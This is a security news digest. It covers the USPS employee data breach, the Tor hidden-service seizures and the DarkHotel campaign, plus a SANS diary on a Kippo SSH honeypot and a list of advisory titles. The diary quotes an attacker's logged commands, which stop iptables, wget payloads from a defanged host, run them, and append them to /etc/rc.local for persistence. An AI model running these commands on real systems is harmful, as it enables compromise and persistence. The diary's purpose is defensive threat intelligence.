(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

All United States Postal Service (USPS) employees’ personal data—including names, addresses, social security numbers—has been exposed as the result of a hack believed to have originated from China. According to its own tally, USPS employs over 600,000 people.

"We began investigating this incident as soon as we learned of it, and we are cooperating with the investigation, which is ongoing," David Partenheimer, a USPS spokesman, wrote in a statement (PDF) on Monday. "The investigation is being led by the Federal Bureau of Investigation and joined by other federal and postal investigatory agencies. The intrusion is limited in scope and all operations of the Postal Service are functioning normally."

The USPS does not believe that in-store customer data was exposed, but customers who contacted the agency via e-mail or phone between January 1 and August 16, 2014 may have been.

Read 4 remaining paragraphs | Comments


A number of my fellow Handlers have discussed Kippo [1], a SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is randomly predictable; a mixture of known bad IP ranges, researchers or from behind TOR scanning and probing, would be attackers manually entering information from their jump boxes or home machines.

What caught my eye was a number of separate brute force attacks that succeeded and then manifested the same behaviour, all within a single day.Despite the IP addresses of the scans, the pickup file locations and the downloaded file names being different the captured scripts from the Kippo logs and, more importantly in this case, the hashes were identical for the two files [2] [3] that were retrieved and attempted to run on Kippos fake system

So what? you may ask. I like to draw lessons learnt from this type of honeypot interaction which help provide some tactical and operational intelligence that can be passed other teams to use. Dont limit this type of information gather to just the security teams, for example our friends in audit and compliance need to know what common usernames and passwords are being used in these types of attacks to keep them current and well advised. A single line note on a daily report to the stakeholders for security may being in order if your organisation is running internet facing Linux systems with SSH running port TCP 22 for awareness.

Here are some of the one I detailed that would be passed to the security team.

1) The password 12345 isnt very safe who knew? (implied sarcasm)
2) The adversary was a scripted session with no error checking (see the scripts actions below)
3) The roughly two hours attacks from each unique IP address shows a lack of centralised command and control
4) The malware dropped was being reported in VirusTotal a day before I submitted my copies, so this most likely is a relatively new set of scanning and attacks
5) The target of the attack is to compromise Linux systems
6) The adversary hosting file locations are on Windows systems based in China running HFS v2.3c 291 [4] a free windows web server on port 8889 which has a known Remote Command Execution flaw the owner should probably looked at updating.
7) Running static or dynamic analysis of the captured Linux binaries provided a wealth of further indicators
8) The IP addresses of the scanning and host servers
9) And a nice list of usernames and passwords to be added to the never, ever use these of anything (root/root, root/password, admin/admin etc)

Id normally offer up any captured binaries for further analysis, if the teams had the capacity to do this or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard coded commands, IP addresses, domain names etc)

If you have any other comments on how to make honeypots collections relevant, please drop me a line!">Recorded commands by Kippo
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./ badfile1
cd /tmp
tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./ badfile2
bash: ./ badfile2: command not found
/tmp# cd /tmp
/tmp# echo cd /root//etc/rc.local
cd /root//etc/rc.local
/tmp# echo ./ badfile1/etc/rc.local
./ badfile1/etc/rc.local
/tmp# echo ./ badfile2/etc/rc.local
./ux badfile2/etc/rc.local
/tmp# echo /etc/init.d/iptables stop/etc/rc.local
/etc/init.d/iptables stop/etc/rc.local

[1] Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. https://github.com/desaster/kippo

[2] File hash 1 0601aa569d59175733db947f17919bb7 https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/
[3] File hash 2 60ab24296bb0d9b7e1652d8bde24280b https://www.virustotal.com/en/file/f84ff1fb5cf8c0405dd6218bc9ed1d3562bf4f3e08fbe23f3982bfd4eb792f4d/analysis/

[4] http://sourceforge.net/projects/hfs/
[5] http://www.cuckoosandbox.org/

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The FBI-ICE-Europol seizure page greeted users to Doxbin's main .onion page. Doxbin wasn't named in the Justice Department's filings, and no explanation of the seizure has been given.

In a blog post written on November 9, Tor Project director Andrew Lewman went over the possible ways that over 400 hidden services on dozens of servers were located by law enforcement during Operation Onymous. While some of the servers were related to criminal activity (such as Silk Road 2.0), at least some of the servers were not—including several that were acting as infrastructure for Tor’s anonymizing network. And the only answer Lewman could currently offer as to how the sites were exposed was “We don’t know.”

That's unnerving not just to people like the operators of the many illicit sites that were taken down by Operation Onymous, it’s also of concern to anyone using Tor to evade surveillance by more oppressive governments. Activists, dissidents, and journalists, for example, all rely on the same Tor infrastructure.

“If you are an activist or a journalist in these countries, your government thinks you are a criminal,” Eva Galperin, Global Policy Analyst for the Electronic Frontier Foundation, told Ars. “And you can learn a lot about good operational security practices by watching where criminals go wrong reading the affidavits on these cases, because your government is treating you as a criminal.”

Read 16 remaining paragraphs | Comments


Researchers have uncovered a seven-year-old malware operation that combines advanced cryptographic attacks, zero-day exploits, and well-developed keyloggers to target elite executives staying in luxury hotels during business trips.

The attackers behind "DarkHotel," as the advanced persistent threat has been dubbed, appear to know in advance when a targeted exec will check in and check out of a hotel. Victims are infected through a variety of methods, including bogus software updates for Adobe Flash, Google Toolbar, or other trusted software that are presented when the exec uses the hotel's Wi-Fi or wired Internet access. In many cases, the attack code is signed with a trusted digital certificate that the attackers were able to clone by factoring the underlying 512-bit private key. While factoring weak 512-bit keys has been practical for several years, the crypto attack nonetheless is an "advanced" capability, particularly a few years ago. Taken together, the characteristics are an indication the operators have some sophistication, said researchers from Kaspersky Lab, the Russia-based security firm that disclosed the campaign.

"The fact that most of the time the victims are top executives indicates the attackers have knowledge of their victims whereabouts, including name and place of stay," the researchers wrote in a report published Monday. "This paints a dark, dangerous web in which unsuspecting travelers can easily fall. While the exact reason why some hotels function as an attacker vector are unknown, certain suspicions exist, indicating possibly a much larger compromise. We are still investigating this aspect of the operation and will publish more information in the future."

Read 6 remaining paragraphs | Comments

Time is not your friend when your information systems are under cyber attack, but sharing threat information before, during, and after an attack with a trusted group of peers can help. Not only does it alert the other members of your ...
Nuevoplayer CVE-2014-8339 SQL Injection Vulnerability
WordPress Compfight Plugin 'compfight-search.php' Cross Site Scripting Vulnerability
LinuxSecurity.com: Security Report Summary
LinuxSecurity.com: Multiple vulnerabilities have been discovered in PHP, the worst of which could lead to remote execution of arbitrary code.
LinuxSecurity.com: Security Report Summary
IBM Notes Traveler For Android CVE-2014-6130 Man in the Middle Information Disclosure Vulnerability
Linux Kernel 'net/mac80211/tx.c' Information Disclosure Vulnerability
[The ManageOwnage series, part VIII]: Remote code execution and blind SQLi in OpManager, Social IT and IT360
[The ManageOwnage Series, part VII]: Super admin privesc + password DB dump in Password Manager Pro
[SECURITY] [DSA 3070-1] kfreebsd-9 security update
CVE-2014-3629: Apache Qpid's qpidd can be induced to make http requests
Internet Storm Center Infocon Status